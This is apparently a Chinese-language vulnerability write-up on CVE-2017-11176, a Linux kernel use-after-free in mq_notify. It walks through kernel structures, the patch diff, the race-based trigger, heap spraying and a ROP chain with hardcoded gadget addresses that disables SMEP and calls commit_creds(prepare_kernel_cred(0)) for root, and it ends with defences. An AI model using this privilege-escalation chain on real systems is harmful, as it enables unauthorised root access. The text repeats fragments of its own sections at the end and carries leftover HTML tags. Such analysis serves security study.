CVE-2017-11176 Linux内核漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2017-11176是Linux内核中的一个use-after-free漏洞，存在于mq_notify系统调用中。该漏洞由于在错误处理路径中未正确置空sock指针，导致后续可能引用已释放的内存，从而可能被利用来提升权限。<\/p>

环境准备<\/h2>

Linux内核版本：4.1.1<\/li>

调试工具：QEMU<\/li> <\/ul>

相关内核结构<\/h2>

task_struct<\/h3>

struct<\/span> task_struct {
<\/span><\/span>    volatile<\/span> long<\/span> state;        \/\/ 进程状态
<\/span><\/span><\/span><\/span>    void<\/span> *<\/span>stack;                \/\/ 任务堆栈指针
<\/span><\/span><\/span><\/span>    int<\/span> prio;                   \/\/ 进程优先级
<\/span><\/span><\/span><\/span>    struct<\/span> mm_struct *<\/span>mm;       \/\/ 内存地址空间
<\/span><\/span><\/span><\/span>    struct<\/span> files_struct *<\/span>files; \/\/ 打开文件信息
<\/span><\/span><\/span><\/span>    const<\/span> struct<\/span> cred *<\/span>cred;    \/\/ 凭证，保存uid等权限信息
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>文件描述符相关结构<\/h3>

fd<\/strong>：对于给定进程的整数描述符<\/li>
file对象(struct file)<\/strong>：表示已打开的文件<\/li>
<\/ol>
struct<\/span> file {
<\/span><\/span>    loff_t f_pos;               \/\/ 文件位置指针
<\/span><\/span><\/span><\/span>    atomic_long_t f_count;      \/\/ 引用计数器
<\/span><\/span><\/span><\/span>    const<\/span> struct<\/span> file_operations *<\/span>f_op; \/\/ 虚函数表指针
<\/span><\/span><\/span><\/span>    void<\/span> *<\/span>private_data;         \/\/ 文件专用数据
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
fdt(struct fdtable)<\/strong>：将fd映射到对应的filp<\/li>
<\/ol>
struct<\/span> fdtable {
<\/span><\/span>    unsigned<\/span> int<\/span> max_fds;
<\/span><\/span>    struct<\/span> file **<\/span>fd;           \/\/ 当前fd数组
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
file_struct<\/strong>：将fdt链接到进程内部<\/li>
<\/ol>
struct<\/span> files_struct {
<\/span><\/span>    atomic_t count;             \/\/ 引用计数器
<\/span><\/span><\/span><\/span>    struct<\/span> fdtable *<\/span>fdt;        \/\/ 指向文件描述符表的指针
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>网络相关结构<\/h3>

socket<\/strong>：网络栈顶层结构<\/li>
<\/ol>
struct<\/span> socket {
<\/span><\/span>    struct<\/span> file *<\/span>file;
<\/span><\/span>    struct<\/span> sock *<\/span>sk;
<\/span><\/span>    const<\/span> struct<\/span> proto_ops *<\/span>ops;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
sock<\/strong>：底层网络控制结构<\/li>
<\/ol>
struct<\/span> sock {
<\/span><\/span>    int<\/span> sk_rcvbuf;              \/\/ 接收缓冲区理论最大值
<\/span><\/span><\/span><\/span>    int<\/span> sk_sndbuf;              \/\/ 发送缓冲区理论最大值
<\/span><\/span><\/span><\/span>    atomic_t sk_rmem_alloc;     \/\/ 接收缓冲区当前大小
<\/span><\/span><\/span><\/span>    atomic_t sk_wmem_alloc;     \/\/ 发送缓冲区当前大小
<\/span><\/span><\/span><\/span>    struct<\/span> sk_buff_head sk_receive_queue;  \/\/ 接收队列
<\/span><\/span><\/span><\/span>    struct<\/span> sk_buff_head sk_write_queue;     \/\/ 发送队列
<\/span><\/span><\/span><\/span>    struct<\/span> socket *<\/span>sk_socket;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
sk_buff(skb)<\/strong>：网络数据包结构<\/li>
<\/ol>
Netlink Socket<\/h3>
Netlink是一种特殊socket，允许用户空间与内核通信。其专用结构：<\/p>
struct<\/span> netlink_sock {
<\/span><\/span>    \/* struct sock has to be the first member of netlink_sock *\/<\/span>
<\/span><\/span>    struct<\/span> sock sk;
<\/span><\/span>    u32 pid;
<\/span><\/span>    u32 dst_pid;
<\/span><\/span>    u32 dst_group;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞存在于mq_notify<\/code>系统调用中，具体在ipc\/mqueue.c<\/code>文件中。问题在于错误处理路径中未正确置空sock指针。<\/p>
补丁对比：<\/p>
diff --git a\/ipc\/mqueue.c b\/ipc\/mqueue.c
<\/span><\/span>index c9ff943..eb1391b 100644
<\/span><\/span>--- a\/ipc\/mqueue.c
<\/span><\/span><\/span><\/span>+++ b\/ipc\/mqueue.c
<\/span><\/span><\/span><\/span>@@ -1270,8 +1270,10 @@ retry:
<\/span><\/span><\/span><\/span>
<\/span><\/span>     timeo = MAX_SCHEDULE_TIMEOUT;
<\/span><\/span>     ret = netlink_attachskb(sock, nc, &timeo, NULL);
<\/span><\/span>-    if (ret == 1)
<\/span><\/span><\/span><\/span>+    if (ret == 1) {
<\/span><\/span><\/span>+       sock = NULL;
<\/span><\/span><\/span><\/span>        goto retry;
<\/span><\/span>+     }
<\/span><\/span><\/span><\/span>     if (ret) {
<\/span><\/span>        sock = NULL;
<\/span><\/span>        nc = NULL;
<\/span><\/span><\/code><\/pre>漏洞触发流程<\/h3>

mq_notify<\/code>调用netlink_getsockbyfilp<\/code>获取sock对象，增加引用计数<\/li>
调用netlink_attachskb<\/code>尝试附加skb到sock

如果返回1，表示需要重试<\/li>
在重试路径中，如果文件描述符被关闭，会导致后续使用已释放的sock对象<\/li>
<\/ul>
<\/li>
<\/ol>
引用计数问题<\/h3>
正常流程：<\/p>

netlink_getsockbyfilp<\/code> -> sock_hold()<\/code>: sk->refcnt += 1<\/li>
netlink_attachskb<\/code> -> sock_put()<\/code>: sk->refcnt -= 1<\/li>
<\/ul>
漏洞触发时：<\/p>

线程1进入重试路径<\/li>
线程2关闭文件描述符<\/li>
线程1继续使用已释放的sock对象<\/li>
<\/ul>
漏洞利用<\/h2>
利用步骤<\/h3>


触发漏洞条件<\/strong>：<\/p>

使sk_rmem_alloc > sk_rcvbuf<\/code>，让netlink_attachskb<\/code>返回1<\/li>
通过多线程操作，在重试路径中关闭文件描述符<\/li>
<\/ul>
<\/li>

堆喷控制<\/strong>：<\/p>

使用sendmsg<\/code>系统调用分配kmalloc-1024对象<\/li>
伪造wait_queue_t<\/code>结构控制程序流<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

构造ROP链执行commit_creds(prepare_kernel_cred(0))<\/code><\/li>
绕过SMEP\/SMAP保护<\/li>
<\/ul>
<\/li>
<\/ol>
关键利用代码<\/h3>
\/\/ 堆喷控制
<\/span><\/span><\/span><\/span>struct<\/span> u_wait_queue {
<\/span><\/span>    unsigned<\/span> int<\/span> flag;
<\/span><\/span>    long<\/span>*<\/span> pri;
<\/span><\/span>    long<\/span>*<\/span> func;
<\/span><\/span>    long<\/span>*<\/span> next;
<\/span><\/span>    long<\/span>*<\/span> prev;
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 构造ROP链
<\/span><\/span><\/span><\/span>size_t *<\/span>p =<\/span> ((unsigned<\/span> int<\/span>)&<\/span>uwq)&<\/span>0xffffffff<\/span>;
<\/span><\/span>size_t *<\/span>ptmp =<\/span> p-<\/span>0x20<\/span>;
<\/span><\/span>mmap(ptmp, 0x200<\/span>, 7<\/span>, MAP_PRIVATE |<\/span> MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>);
<\/span><\/span>
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff811b265d<\/span>; \/\/ pop rdi ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0x6f0<\/span>;              \/\/ CR4值
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff810031bd<\/span>; \/\/ mov cr4, rdi ; pop rbp ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> (unsigned<\/span> long<\/span>)p+<\/span>0x100<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff8100abde<\/span>; \/\/ pop rax ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff811b265d<\/span>; \/\/ pop rdi ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff810a1a60<\/span>; \/\/ prepare_kernel_cred
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff8133ff34<\/span>; \/\/ mov rdi, rax ; mov rax, rdi ; pop rbx ; pop rbp ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> (unsigned<\/span> long<\/span>)p+<\/span>0x100<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff810a1720<\/span>; \/\/ commit_creds
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff81063d54<\/span>; \/\/ swapgs ; pop rbp ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> p+<\/span>0x100<\/span>;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff811b265d<\/span>; \/\/ pop rdi ; ret
<\/span><\/span><\/span><\/span>p[r++<\/span>] =<\/span> getshell;
<\/span><\/span>p[r++<\/span>] =<\/span> 0xffffffff818410c7<\/span>; \/\/ iretd ; call rdi
<\/span><\/span><\/span><\/code><\/pre>防御措施<\/h2>

应用官方补丁<\/li>
启用KASLR、SMEP、SMAP等内核保护机制<\/li>
限制用户命名空间等特权操作<\/li>
<\/ol>
参考链接<\/h2>

Lexfo博客详细分析<\/a><\/li>
Seebug Paper中文分析<\/a><\/li>
<\/ol>

CVE-2017-11176 Linux内核漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2017-11176是Linux内核中的一个use-after-free漏洞，存在于mq_notify系统调用中。该漏洞由于在错误处理路径中未正确置空sock指针，导致后续可能引用已释放的内存，从而可能被利用来提升权限。<\/p>

相关内核结构<\/h2>

漏洞分析<\/h2>

漏洞利用<\/h2>

防御措施<\/h2> 应用官方补丁<\/li> 启用KASLR、SMEP、SMAP等内核保护机制<\/li> 限制用户命名空间等特权操作<\/li> <\/ol> 参考链接<\/h2> Lexfo博客详细分析<\/a><\/li> Seebug Paper中文分析<\/a><\/li> <\/ol>

参考链接<\/h2> Lexfo博客详细分析<\/a><\/li> Seebug Paper中文分析<\/a><\/li> <\/ol>

漏洞概述<\/h2>
CVE-2017-11176是Linux内核中的一个use-after-free漏洞，存在于mq_notify系统调用中。该漏洞由于在错误处理路径中未正确置空sock指针，导致后续可能引用已释放的内存，从而可能被利用来提升权限。<\/p>

防御措施<\/h2>

应用官方补丁<\/li>
启用KASLR、SMEP、SMAP等内核保护机制<\/li>
限制用户命名空间等特权操作<\/li> <\/ol>
参考链接<\/h2>

Lexfo博客详细分析<\/a><\/li>
Seebug Paper中文分析<\/a><\/li> <\/ol>

参考链接<\/h2>

Lexfo博客详细分析<\/a><\/li>
Seebug Paper中文分析<\/a><\/li> <\/ol>